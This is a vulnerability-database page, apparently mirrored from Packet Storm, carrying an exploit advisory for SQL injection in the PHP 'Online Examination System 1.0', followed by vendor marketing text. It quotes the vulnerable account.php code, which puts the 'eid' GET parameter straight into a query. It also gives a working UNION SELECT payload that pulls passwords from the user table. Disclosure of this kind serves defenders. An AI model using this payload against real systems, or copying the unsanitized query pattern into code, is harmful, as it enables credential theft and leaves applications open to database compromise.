Lucene search
K

Online Examination System 1.0 SQL Injection

🗓️ 29 Sep 2022 00:00:00Reported by Yousef AlraddadiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 211 Views

Online Examination System 1.0 SQL Injection vulnerability in account.php fil

Code
`# Exploit Title: Online Examination System - SQL Injection  
# Google Dork: N/A  
# Date: 2022-9-28  
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11  
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/  
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip  
# Tested on: windows 11 - XAMPP  
# CVE : N/A  
# Version: 1.0  
  
Vulnerability Details  
======================  
  
Steps :  
  
vulnerable code in file account.php  
  
<?php  
if(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {  
$eid=@$_GET['eid'];  
$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );  
echo '<div class="panel" style="margin:5%">';  
while($row=mysqli_fetch_array($q) )  
?>  
  
1) Log in to the application after register new user  
  
inject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Sep 2022 00:00Current
7.4High risk
Vulners AI Score7.4
211